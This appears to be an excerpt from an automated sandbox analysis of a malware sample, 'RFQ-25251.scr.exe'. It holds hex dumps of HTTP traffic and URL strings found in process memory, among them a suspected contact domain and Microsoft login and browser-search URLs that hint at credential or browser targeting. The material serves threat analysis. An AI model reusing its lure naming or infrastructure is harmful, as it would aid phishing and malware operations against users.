bc f9 e4 ce 50 f0 cf e3 ac 7a a3 56 6f 4c f8 f3 a1 31 db 16 8b 3f 61 3e b1 72 c2 79 f6 78 67 67 b7 f7 f8 d3 34 c8 9c a0 f7 55 e3 11 c4 78 9a 39 59 4f de 86 a3 9d af 82 6f be
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Tue, 14 May 2024 10:53:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=0qbha5f6d9341curma4a42tb68; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheData Raw: 61 31 37 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 6c 61 6e 67 3d 22 69 74 22 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 32 64 2f 32 64 69 2f 32 64 69 76 33 68 2e 73 76 67 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 73 69 7a 65 73 3d 22 61 6e 79 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 30 37 2f 30 37 66 2f 30 37 66 7a 71 38 2e 73 76 67 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                Source: RFQ-25251.scr.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: RFQ-25251.scr.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004676000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003E56000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fedoraproject.org/
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004676000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003E56000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
                Source: RFQ-25251.scr.exeString found in binary or memory: http://ocsp.comodoca.com0
                Source: ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3741723282.00000000050F8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.solesense.pro
                Source: ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3741723282.00000000050F8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.solesense.pro/aleu/
                Source: replace.exe, 0000000F.00000002.3743671082.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://arsys.es/css/parking2.css
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/default.css
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/footer.html
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/header.html
                Source: firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/images/icon.png
                Source: firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/images/thumbnail.png
                Source: replace.exe, 0000000F.00000002.3743671082.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: replace.exe, 0000000F.00000002.3743671082.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: replace.exe, 0000000F.00000002.3743671082.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/client/js.polyfill/container-query-polyfill.modern.js
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/01/01h/01hx1m.css?ph=cb3a78e957
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/04/04p/04pi85.css?ph=cb3a78e957
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e957
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/0e/0e7/0e7xip.css?ph=cb3a78e957
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/0u/0ua/0ua55l.js?ph=cb3a78e957
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/13/13s/13s9j7.css?ph=cb3a78e957
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/1a/1an/1anfpg.css?ph=cb3a78e957
                Source: ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/2d/2di/2div3h.svg?ph=cb3a78e957
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/2v/2v4/2v414g.css?ph=cb3a78e957
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/32/32i/32i65q.css?ph=cb3a78e957
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/3c/3cw/3cwfrk.css?ph=cb3a78e957
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/3f/3f9/3f9vvf.css?ph=cb3a78e957
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/4a/4a3/4a3t1k.css?ph=cb3a78e957
                Source: replace.exe, 0000000F.00000002.3743671082.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: replace.exe, 0000000F.00000002.3743671082.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: replace.exe, 0000000F.00000002.3743671082.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://events.webnode.com/projects/-/events/
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://klientams.iv.lt/
                Source: replace.exe, 0000000F.00000002.3729973760.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: replace.exe, 0000000F.00000002.3729973760.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: replace.exe, 0000000F.00000002.3729973760.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: replace.exe, 0000000F.00000002.3729973760.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: replace.exe, 0000000F.00000002.3729973760.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
                Source: replace.exe, 0000000F.00000002.3729973760.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: replace.exe, 0000000F.00000002.3729973760.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: replace.exe, 0000000F.00000002.3729973760.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: replace.exe, 0000000F.00000003.1757284571.0000000007829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ogp.me/ns#
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003E9C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000367C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wnucetgswsjvfbno.app
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/backup?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=backup
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/correo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/crear/tienda?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=tiendas
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/buscar?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominio
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/gestion?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=resell
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=ssl
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominios
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=seo
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/herramientas/sms?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=sms
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting/revendedores?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=re
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting/wordpress?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=wordp
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hosting
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/partners?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=partners
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/cloud?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=cloud
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/dedicados?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=de
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/vps?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=vps
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutions
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=arsys
                Source: RFQ-25251.scr.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: replace.exe, 0000000F.00000002.3743671082.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-542MMSL
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/domenai/
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/duomenu-centras/
